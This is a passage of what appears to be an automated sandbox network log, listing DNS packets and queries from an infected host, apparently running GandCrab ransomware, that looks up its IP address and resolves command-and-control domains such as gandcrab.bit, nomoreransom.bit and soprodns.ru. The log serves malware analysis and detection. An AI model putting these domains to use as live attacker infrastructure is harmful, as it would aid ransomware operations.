Aug 31, 2022 23:50:20.616091013 CEST	50158	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:50:20.633987904 CEST	53	50158	8.8.8.8	192.168.2.7
Aug 31, 2022 23:50:20.634430885 CEST	64323	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:50:20.654202938 CEST	53	64323	8.8.8.8	192.168.2.7
Aug 31, 2022 23:50:20.654583931 CEST	64324	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:50:20.672302961 CEST	53	64324	8.8.8.8	192.168.2.7
Aug 31, 2022 23:50:22.412148952 CEST	59695	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:50:23.034744024 CEST	53	59695	8.8.8.8	192.168.2.7
Aug 31, 2022 23:50:23.040985107 CEST	60838	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:50:23.058167934 CEST	53	60838	8.8.8.8	192.168.2.7
Aug 31, 2022 23:50:23.058562994 CEST	60839	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:50:23.078299999 CEST	53	60839	8.8.8.8	192.168.2.7
Aug 31, 2022 23:50:23.078639984 CEST	60840	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:50:23.096414089 CEST	53	60840	8.8.8.8	192.168.2.7
Aug 31, 2022 23:50:23.096844912 CEST	60841	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:50:23.114574909 CEST	53	60841	8.8.8.8	192.168.2.7
Aug 31, 2022 23:50:23.114940882 CEST	60842	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:50:23.134742975 CEST	53	60842	8.8.8.8	192.168.2.7
Aug 31, 2022 23:50:24.405147076 CEST	65478	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:50:24.436777115 CEST	53	65478	8.8.8.8	192.168.2.7
Aug 31, 2022 23:50:24.446861982 CEST	55832	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:50:24.464018106 CEST	53	55832	8.8.8.8	192.168.2.7
Aug 31, 2022 23:50:24.464561939 CEST	55833	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:50:24.482281923 CEST	53	55833	8.8.8.8	192.168.2.7
Aug 31, 2022 23:50:24.482691050 CEST	55834	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:50:24.502979040 CEST	53	55834	8.8.8.8	192.168.2.7
Aug 31, 2022 23:50:24.503509045 CEST	55835	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:50:24.521646976 CEST	53	55835	8.8.8.8	192.168.2.7
Aug 31, 2022 23:50:24.524842024 CEST	55836	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:50:24.544363976 CEST	53	55836	8.8.8.8	192.168.2.7
Aug 31, 2022 23:50:25.783303976 CEST	60079	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:50:26.785877943 CEST	60079	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:50:26.947271109 CEST	53	60079	8.8.8.8	192.168.2.7
Aug 31, 2022 23:50:26.957772017 CEST	60080	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:50:26.987024069 CEST	53	60080	8.8.8.8	192.168.2.7
Aug 31, 2022 23:50:26.987798929 CEST	60081	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:50:27.015486002 CEST	53	60081	8.8.8.8	192.168.2.7
Aug 31, 2022 23:50:27.025521994 CEST	60082	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:50:29.035577059 CEST	60083	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:50:29.053275108 CEST	53	60083	8.8.8.8	192.168.2.7
Aug 31, 2022 23:50:29.053632975 CEST	60084	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:50:29.071413040 CEST	53	60084	8.8.8.8	192.168.2.7
Aug 31, 2022 23:50:30.635474920 CEST	56771	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:50:31.172678947 CEST	53	56771	8.8.8.8	192.168.2.7
Aug 31, 2022 23:50:31.817447901 CEST	56772	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:50:31.836168051 CEST	53	56772	8.8.8.8	192.168.2.7
Aug 31, 2022 23:50:31.838449955 CEST	56773	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:50:31.860229969 CEST	53	56773	8.8.8.8	192.168.2.7
Aug 31, 2022 23:50:31.909568071 CEST	56774	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:50:31.927282095 CEST	53	56774	8.8.8.8	192.168.2.7
Aug 31, 2022 23:50:31.927813053 CEST	56775	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:50:31.948879957 CEST	53	56775	8.8.8.8	192.168.2.7
Aug 31, 2022 23:50:31.949356079 CEST	56776	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:50:31.968821049 CEST	53	56776	8.8.8.8	192.168.2.7
Aug 31, 2022 23:50:34.855798960 CEST	59546	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:50:35.849972963 CEST	59546	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:50:36.850053072 CEST	59546	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:50:36.938282013 CEST	53	59546	8.8.8.8	192.168.2.7
Aug 31, 2022 23:50:36.947161913 CEST	59547	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:50:36.964608908 CEST	53	59547	8.8.8.8	192.168.2.7
Aug 31, 2022 23:50:36.965760946 CEST	59548	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:50:36.973332882 CEST	53	59546	8.8.8.8	192.168.2.7
Aug 31, 2022 23:50:36.985584021 CEST	53	59548	8.8.8.8	192.168.2.7
Aug 31, 2022 23:50:36.986126900 CEST	59549	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:50:37.003935099 CEST	53	59549	8.8.8.8	192.168.2.7
Aug 31, 2022 23:50:37.016809940 CEST	59550	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:50:37.036745071 CEST	53	59550	8.8.8.8	192.168.2.7
Aug 31, 2022 23:50:37.037426949 CEST	59551	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:50:37.055305004 CEST	53	59551	8.8.8.8	192.168.2.7
Aug 31, 2022 23:50:38.372488022 CEST	57555	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:50:38.477780104 CEST	53	59546	8.8.8.8	192.168.2.7
Aug 31, 2022 23:50:38.951469898 CEST	53	57555	8.8.8.8	192.168.2.7
Aug 31, 2022 23:50:38.961877108 CEST	57556	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:50:38.980972052 CEST	53	57556	8.8.8.8	192.168.2.7
Aug 31, 2022 23:50:38.982656956 CEST	57557	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:50:39.002156019 CEST	53	57557	8.8.8.8	192.168.2.7
Aug 31, 2022 23:50:39.002620935 CEST	57558	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:50:39.022454023 CEST	53	57558	8.8.8.8	192.168.2.7
Aug 31, 2022 23:50:39.022998095 CEST	57559	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:50:39.042603016 CEST	53	57559	8.8.8.8	192.168.2.7
Aug 31, 2022 23:50:39.043083906 CEST	57560	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:50:39.062616110 CEST	53	57560	8.8.8.8	192.168.2.7
Aug 31, 2022 23:50:40.316248894 CEST	61172	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:50:40.345277071 CEST	53	61172	8.8.8.8	192.168.2.7
Aug 31, 2022 23:50:40.395659924 CEST	61173	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:50:40.414843082 CEST	53	61173	8.8.8.8	192.168.2.7
Aug 31, 2022 23:50:40.415440083 CEST	61174	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:50:40.433434963 CEST	53	61174	8.8.8.8	192.168.2.7
Aug 31, 2022 23:50:40.433840990 CEST	61175	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:50:40.453635931 CEST	53	61175	8.8.8.8	192.168.2.7
Aug 31, 2022 23:50:40.454135895 CEST	61176	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:50:40.473654032 CEST	53	61176	8.8.8.8	192.168.2.7
Aug 31, 2022 23:50:40.475631952 CEST	61177	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:50:40.493432045 CEST	53	61177	8.8.8.8	192.168.2.7
Aug 31, 2022 23:50:41.741760969 CEST	62908	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:50:41.813671112 CEST	53	62908	8.8.8.8	192.168.2.7
Aug 31, 2022 23:50:41.824610949 CEST	62909	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:50:41.843774080 CEST	53	62909	8.8.8.8	192.168.2.7
Aug 31, 2022 23:50:41.844460011 CEST	62910	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:50:41.863992929 CEST	53	62910	8.8.8.8	192.168.2.7
Aug 31, 2022 23:50:41.864871025 CEST	62911	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:50:41.884527922 CEST	53	62911	8.8.8.8	192.168.2.7
Aug 31, 2022 23:50:41.885083914 CEST	62912	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:50:41.903028011 CEST	53	62912	8.8.8.8	192.168.2.7
Aug 31, 2022 23:50:41.903497934 CEST	62913	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:50:41.922991037 CEST	53	62913	8.8.8.8	192.168.2.7
Aug 31, 2022 23:50:43.153091908 CEST	52838	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:50:43.720691919 CEST	53	52838	8.8.8.8	192.168.2.7
Aug 31, 2022 23:50:43.728780031 CEST	52839	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:50:43.746124983 CEST	53	52839	8.8.8.8	192.168.2.7
Aug 31, 2022 23:50:43.746818066 CEST	52840	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:50:43.766308069 CEST	53	52840	8.8.8.8	192.168.2.7
Aug 31, 2022 23:50:43.766763926 CEST	52841	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:50:43.786328077 CEST	53	52841	8.8.8.8	192.168.2.7
Aug 31, 2022 23:50:43.786806107 CEST	52842	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:50:43.804389954 CEST	53	52842	8.8.8.8	192.168.2.7
Aug 31, 2022 23:50:43.804909945 CEST	52843	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:50:43.824862003 CEST	53	52843	8.8.8.8	192.168.2.7
Aug 31, 2022 23:50:44.889817953 CEST	59846	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:50:45.880757093 CEST	59846	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:50:46.606601000 CEST	53	59846	8.8.8.8	192.168.2.7
Aug 31, 2022 23:50:46.613910913 CEST	59847	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:50:46.633125067 CEST	53	59847	8.8.8.8	192.168.2.7
Aug 31, 2022 23:50:46.635471106 CEST	59848	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:50:46.655035973 CEST	53	59848	8.8.8.8	192.168.2.7
Aug 31, 2022 23:50:46.658423901 CEST	59849	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:50:46.676173925 CEST	53	59849	8.8.8.8	192.168.2.7
Aug 31, 2022 23:50:46.682796955 CEST	59850	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:50:46.702325106 CEST	53	59850	8.8.8.8	192.168.2.7
Aug 31, 2022 23:50:46.705234051 CEST	59851	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:50:46.724997044 CEST	53	59851	8.8.8.8	192.168.2.7
Aug 31, 2022 23:50:47.795392036 CEST	63291	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:50:47.913981915 CEST	53	63291	8.8.8.8	192.168.2.7
Aug 31, 2022 23:50:47.921678066 CEST	63292	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:50:47.938807011 CEST	53	63292	8.8.8.8	192.168.2.7
Aug 31, 2022 23:50:47.940115929 CEST	63293	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:50:47.961014032 CEST	53	63293	8.8.8.8	192.168.2.7
Aug 31, 2022 23:50:47.961478949 CEST	63294	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:50:47.982100964 CEST	53	63294	8.8.8.8	192.168.2.7
Aug 31, 2022 23:50:47.982625961 CEST	63295	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:50:48.002609015 CEST	53	63295	8.8.8.8	192.168.2.7
Aug 31, 2022 23:50:48.003145933 CEST	63296	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:50:48.020875931 CEST	53	63296	8.8.8.8	192.168.2.7
Aug 31, 2022 23:50:48.598846912 CEST	53	59846	8.8.8.8	192.168.2.7
Aug 31, 2022 23:50:49.092647076 CEST	56345	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:50:49.658869028 CEST	53	56345	8.8.8.8	192.168.2.7
Aug 31, 2022 23:50:49.665900946 CEST	56346	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:50:49.685262918 CEST	53	56346	8.8.8.8	192.168.2.7
Aug 31, 2022 23:50:49.685766935 CEST	56347	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:50:49.703661919 CEST	53	56347	8.8.8.8	192.168.2.7
Aug 31, 2022 23:50:49.704097033 CEST	56348	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:50:49.723515987 CEST	53	56348	8.8.8.8	192.168.2.7
Aug 31, 2022 23:50:49.724236012 CEST	56349	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:50:49.746051073 CEST	53	56349	8.8.8.8	192.168.2.7
Aug 31, 2022 23:50:49.746964931 CEST	56350	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:50:49.766846895 CEST	53	56350	8.8.8.8	192.168.2.7
Aug 31, 2022 23:50:50.837404013 CEST	59112	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:50:50.874103069 CEST	53	59112	8.8.8.8	192.168.2.7
Aug 31, 2022 23:50:50.881997108 CEST	59113	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:50:50.899250031 CEST	53	59113	8.8.8.8	192.168.2.7
Aug 31, 2022 23:50:50.899719000 CEST	59114	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:50:50.919481993 CEST	53	59114	8.8.8.8	192.168.2.7
Aug 31, 2022 23:50:50.920149088 CEST	59115	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:50:50.937942982 CEST	53	59115	8.8.8.8	192.168.2.7
Aug 31, 2022 23:50:50.938342094 CEST	59116	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:50:50.958199978 CEST	53	59116	8.8.8.8	192.168.2.7
Aug 31, 2022 23:50:50.958694935 CEST	59117	53	192.168.2.7	8.8.8.8
Aug 31, 2022 23:50:50.978470087 CEST	53	59117	8.8.8.8	192.168.2.7

ICMP Packets

Timestamp	Source IP	Dest IP	Checksum	Code	Type
Aug 31, 2022 23:48:55.747387886 CEST	192.168.2.7	8.8.8.8	d034	(Port unreachable)	Destination Unreachable
Aug 31, 2022 23:49:25.991276979 CEST	192.168.2.7	8.8.8.8	d034	(Port unreachable)	Destination Unreachable
Aug 31, 2022 23:49:42.919677973 CEST	192.168.2.7	8.8.8.8	d034	(Port unreachable)	Destination Unreachable
Aug 31, 2022 23:49:47.542829037 CEST	192.168.2.7	8.8.8.8	d034	(Port unreachable)	Destination Unreachable
Aug 31, 2022 23:49:53.688399076 CEST	192.168.2.7	8.8.8.8	d034	(Port unreachable)	Destination Unreachable
Aug 31, 2022 23:49:59.147907972 CEST	192.168.2.7	8.8.8.8	d034	(Port unreachable)	Destination Unreachable
Aug 31, 2022 23:50:09.702483892 CEST	192.168.2.7	8.8.8.8	d034	(Port unreachable)	Destination Unreachable
Aug 31, 2022 23:50:14.389380932 CEST	192.168.2.7	8.8.8.8	d034	(Port unreachable)	Destination Unreachable
Aug 31, 2022 23:50:36.973524094 CEST	192.168.2.7	8.8.8.8	d034	(Port unreachable)	Destination Unreachable
Aug 31, 2022 23:50:38.478975058 CEST	192.168.2.7	8.8.8.8	d034	(Port unreachable)	Destination Unreachable
Aug 31, 2022 23:50:48.599447966 CEST	192.168.2.7	8.8.8.8	d034	(Port unreachable)	Destination Unreachable

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Aug 31, 2022 23:48:48.162317038 CEST	192.168.2.7	8.8.8.8	0xa44c	Standard query (0)	ipv4bot.whatismyipaddress.com	A (IP address)	IN (0x0001)
Aug 31, 2022 23:48:49.311268091 CEST	192.168.2.7	8.8.8.8	0xe9db	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Aug 31, 2022 23:48:49.449572086 CEST	192.168.2.7	8.8.8.8	0x1	Standard query (0)	8.8.8.8.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Aug 31, 2022 23:48:49.516789913 CEST	192.168.2.7	8.8.8.8	0x2	Standard query (0)	nomoreransom.coin	A (IP address)	IN (0x0001)
Aug 31, 2022 23:48:49.537214041 CEST	192.168.2.7	8.8.8.8	0x3	Standard query (0)	nomoreransom.coin	28	IN (0x0001)
Aug 31, 2022 23:48:49.557590008 CEST	192.168.2.7	8.8.8.8	0x4	Standard query (0)	nomoreransom.coin	A (IP address)	IN (0x0001)
Aug 31, 2022 23:48:49.576618910 CEST	192.168.2.7	8.8.8.8	0x5	Standard query (0)	nomoreransom.coin	28	IN (0x0001)
Aug 31, 2022 23:48:51.461322069 CEST	192.168.2.7	8.8.8.8	0xc607	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Aug 31, 2022 23:48:51.524420977 CEST	192.168.2.7	8.8.8.8	0x1	Standard query (0)	8.8.8.8.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Aug 31, 2022 23:48:51.544537067 CEST	192.168.2.7	8.8.8.8	0x2	Standard query (0)	nomoreransom.bit	A (IP address)	IN (0x0001)
Aug 31, 2022 23:48:51.564976931 CEST	192.168.2.7	8.8.8.8	0x3	Standard query (0)	nomoreransom.bit	28	IN (0x0001)
Aug 31, 2022 23:48:51.586246967 CEST	192.168.2.7	8.8.8.8	0x4	Standard query (0)	nomoreransom.bit	A (IP address)	IN (0x0001)
Aug 31, 2022 23:48:51.605937958 CEST	192.168.2.7	8.8.8.8	0x5	Standard query (0)	nomoreransom.bit	28	IN (0x0001)
Aug 31, 2022 23:48:53.572961092 CEST	192.168.2.7	8.8.8.8	0x9c52	Standard query (0)	dns2.soprodns.ru	A (IP address)	IN (0x0001)
Aug 31, 2022 23:48:54.615896940 CEST	192.168.2.7	8.8.8.8	0x9c52	Standard query (0)	dns2.soprodns.ru	A (IP address)	IN (0x0001)
Aug 31, 2022 23:48:54.869833946 CEST	192.168.2.7	8.8.8.8	0x1	Standard query (0)	8.8.8.8.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Aug 31, 2022 23:48:54.987433910 CEST	192.168.2.7	8.8.8.8	0x2	Standard query (0)	gandcrab.bit	A (IP address)	IN (0x0001)
Aug 31, 2022 23:48:55.077735901 CEST	192.168.2.7	8.8.8.8	0x3	Standard query (0)	gandcrab.bit	28	IN (0x0001)
Aug 31, 2022 23:48:55.097915888 CEST	192.168.2.7	8.8.8.8	0x4	Standard query (0)	gandcrab.bit	A (IP address)	IN (0x0001)
Aug 31, 2022 23:48:55.804713964 CEST	192.168.2.7	8.8.8.8	0x5	Standard query (0)	gandcrab.bit	28	IN (0x0001)
Aug 31, 2022 23:49:00.319737911 CEST	192.168.2.7	8.8.8.8	0x58a8	Standard query (0)	dns2.soprodns.ru	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:01.353461027 CEST	192.168.2.7	8.8.8.8	0x1	Standard query (0)	8.8.8.8.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Aug 31, 2022 23:49:01.374028921 CEST	192.168.2.7	8.8.8.8	0x2	Standard query (0)	nomoreransom.coin	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:01.392597914 CEST	192.168.2.7	8.8.8.8	0x3	Standard query (0)	nomoreransom.coin	28	IN (0x0001)
Aug 31, 2022 23:49:01.422482967 CEST	192.168.2.7	8.8.8.8	0x4	Standard query (0)	nomoreransom.coin	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:01.442715883 CEST	192.168.2.7	8.8.8.8	0x5	Standard query (0)	nomoreransom.coin	28	IN (0x0001)
Aug 31, 2022 23:49:03.618457079 CEST	192.168.2.7	8.8.8.8	0xda7c	Standard query (0)	dns2.soprodns.ru	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:03.674020052 CEST	192.168.2.7	8.8.8.8	0x1	Standard query (0)	8.8.8.8.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Aug 31, 2022 23:49:03.694333076 CEST	192.168.2.7	8.8.8.8	0x2	Standard query (0)	nomoreransom.bit	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:03.720004082 CEST	192.168.2.7	8.8.8.8	0x3	Standard query (0)	nomoreransom.bit	28	IN (0x0001)
Aug 31, 2022 23:49:03.740943909 CEST	192.168.2.7	8.8.8.8	0x4	Standard query (0)	nomoreransom.bit	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:03.761473894 CEST	192.168.2.7	8.8.8.8	0x5	Standard query (0)	nomoreransom.bit	28	IN (0x0001)
Aug 31, 2022 23:49:05.851566076 CEST	192.168.2.7	8.8.8.8	0x4d2c	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:05.950356960 CEST	192.168.2.7	8.8.8.8	0x1	Standard query (0)	8.8.8.8.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Aug 31, 2022 23:49:05.970412970 CEST	192.168.2.7	8.8.8.8	0x2	Standard query (0)	gandcrab.bit	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:05.994076967 CEST	192.168.2.7	8.8.8.8	0x3	Standard query (0)	gandcrab.bit	28	IN (0x0001)
Aug 31, 2022 23:49:06.014112949 CEST	192.168.2.7	8.8.8.8	0x4	Standard query (0)	gandcrab.bit	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:06.034482956 CEST	192.168.2.7	8.8.8.8	0x5	Standard query (0)	gandcrab.bit	28	IN (0x0001)
Aug 31, 2022 23:49:08.298588037 CEST	192.168.2.7	8.8.8.8	0xece3	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:08.379491091 CEST	192.168.2.7	8.8.8.8	0x1	Standard query (0)	8.8.8.8.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Aug 31, 2022 23:49:08.401062012 CEST	192.168.2.7	8.8.8.8	0x2	Standard query (0)	nomoreransom.coin	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:08.421091080 CEST	192.168.2.7	8.8.8.8	0x3	Standard query (0)	nomoreransom.coin	28	IN (0x0001)
Aug 31, 2022 23:49:08.439529896 CEST	192.168.2.7	8.8.8.8	0x4	Standard query (0)	nomoreransom.coin	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:08.460036039 CEST	192.168.2.7	8.8.8.8	0x5	Standard query (0)	nomoreransom.coin	28	IN (0x0001)
Aug 31, 2022 23:49:10.506968975 CEST	192.168.2.7	8.8.8.8	0xeb6b	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:10.567323923 CEST	192.168.2.7	8.8.8.8	0x1	Standard query (0)	8.8.8.8.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Aug 31, 2022 23:49:10.587711096 CEST	192.168.2.7	8.8.8.8	0x2	Standard query (0)	nomoreransom.bit	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:10.608211994 CEST	192.168.2.7	8.8.8.8	0x3	Standard query (0)	nomoreransom.bit	28	IN (0x0001)
Aug 31, 2022 23:49:10.628422022 CEST	192.168.2.7	8.8.8.8	0x4	Standard query (0)	nomoreransom.bit	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:10.646821976 CEST	192.168.2.7	8.8.8.8	0x5	Standard query (0)	nomoreransom.bit	28	IN (0x0001)
Aug 31, 2022 23:49:12.772886038 CEST	192.168.2.7	8.8.8.8	0xaf5b	Standard query (0)	dns2.soprodns.ru	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:12.835031033 CEST	192.168.2.7	8.8.8.8	0x1	Standard query (0)	8.8.8.8.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Aug 31, 2022 23:49:12.853058100 CEST	192.168.2.7	8.8.8.8	0x2	Standard query (0)	gandcrab.bit	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:12.888247967 CEST	192.168.2.7	8.8.8.8	0x3	Standard query (0)	gandcrab.bit	28	IN (0x0001)
Aug 31, 2022 23:49:12.908519030 CEST	192.168.2.7	8.8.8.8	0x4	Standard query (0)	gandcrab.bit	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:12.927716017 CEST	192.168.2.7	8.8.8.8	0x5	Standard query (0)	gandcrab.bit	28	IN (0x0001)
Aug 31, 2022 23:49:19.245435953 CEST	192.168.2.7	8.8.8.8	0x67b9	Standard query (0)	dns2.soprodns.ru	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:19.400525093 CEST	192.168.2.7	8.8.8.8	0x1	Standard query (0)	8.8.8.8.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Aug 31, 2022 23:49:19.420770884 CEST	192.168.2.7	8.8.8.8	0x2	Standard query (0)	nomoreransom.coin	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:19.441392899 CEST	192.168.2.7	8.8.8.8	0x3	Standard query (0)	nomoreransom.coin	28	IN (0x0001)
Aug 31, 2022 23:49:19.466649055 CEST	192.168.2.7	8.8.8.8	0x4	Standard query (0)	nomoreransom.coin	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:19.488183022 CEST	192.168.2.7	8.8.8.8	0x5	Standard query (0)	nomoreransom.coin	28	IN (0x0001)
Aug 31, 2022 23:49:21.671026945 CEST	192.168.2.7	8.8.8.8	0xcf65	Standard query (0)	dns2.soprodns.ru	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:22.227818012 CEST	192.168.2.7	8.8.8.8	0x1	Standard query (0)	8.8.8.8.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Aug 31, 2022 23:49:22.247181892 CEST	192.168.2.7	8.8.8.8	0x2	Standard query (0)	nomoreransom.bit	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:22.268040895 CEST	192.168.2.7	8.8.8.8	0x3	Standard query (0)	nomoreransom.bit	28	IN (0x0001)
Aug 31, 2022 23:49:22.288384914 CEST	192.168.2.7	8.8.8.8	0x4	Standard query (0)	nomoreransom.bit	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:22.306534052 CEST	192.168.2.7	8.8.8.8	0x5	Standard query (0)	nomoreransom.bit	28	IN (0x0001)
Aug 31, 2022 23:49:24.462853909 CEST	192.168.2.7	8.8.8.8	0x5f58	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:25.454030037 CEST	192.168.2.7	8.8.8.8	0x5f58	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:25.622845888 CEST	192.168.2.7	8.8.8.8	0x1	Standard query (0)	8.8.8.8.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Aug 31, 2022 23:49:25.641298056 CEST	192.168.2.7	8.8.8.8	0x2	Standard query (0)	gandcrab.bit	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:25.661866903 CEST	192.168.2.7	8.8.8.8	0x3	Standard query (0)	gandcrab.bit	28	IN (0x0001)
Aug 31, 2022 23:49:25.704473972 CEST	192.168.2.7	8.8.8.8	0x4	Standard query (0)	gandcrab.bit	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:25.724788904 CEST	192.168.2.7	8.8.8.8	0x5	Standard query (0)	gandcrab.bit	28	IN (0x0001)
Aug 31, 2022 23:49:28.680964947 CEST	192.168.2.7	8.8.8.8	0xfd78	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:28.837111950 CEST	192.168.2.7	8.8.8.8	0x1	Standard query (0)	8.8.8.8.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Aug 31, 2022 23:49:28.857135057 CEST	192.168.2.7	8.8.8.8	0x2	Standard query (0)	nomoreransom.coin	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:28.877621889 CEST	192.168.2.7	8.8.8.8	0x3	Standard query (0)	nomoreransom.coin	28	IN (0x0001)
Aug 31, 2022 23:49:28.896074057 CEST	192.168.2.7	8.8.8.8	0x4	Standard query (0)	nomoreransom.coin	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:28.914361000 CEST	192.168.2.7	8.8.8.8	0x5	Standard query (0)	nomoreransom.coin	28	IN (0x0001)
Aug 31, 2022 23:49:31.635144949 CEST	192.168.2.7	8.8.8.8	0x7b4f	Standard query (0)	dns1.soprodns.ru	A (IP address)	IN (0x0001)
Aug 31, 2022 23:49:32.279234886 CEST	192.168.2.7	8.8.8.8	0x1	Standard query (0)	8.8.8.8.in-addr.arpa	PTR (Pointer record)	IN (0x0001)
Aug 31, 2022 23:49:32.298424006 CEST	192.168.2.7	8.8.8.8	0x2	Standard query (0)	nomoreransom.bit	A (IP address)	IN (0x0001)
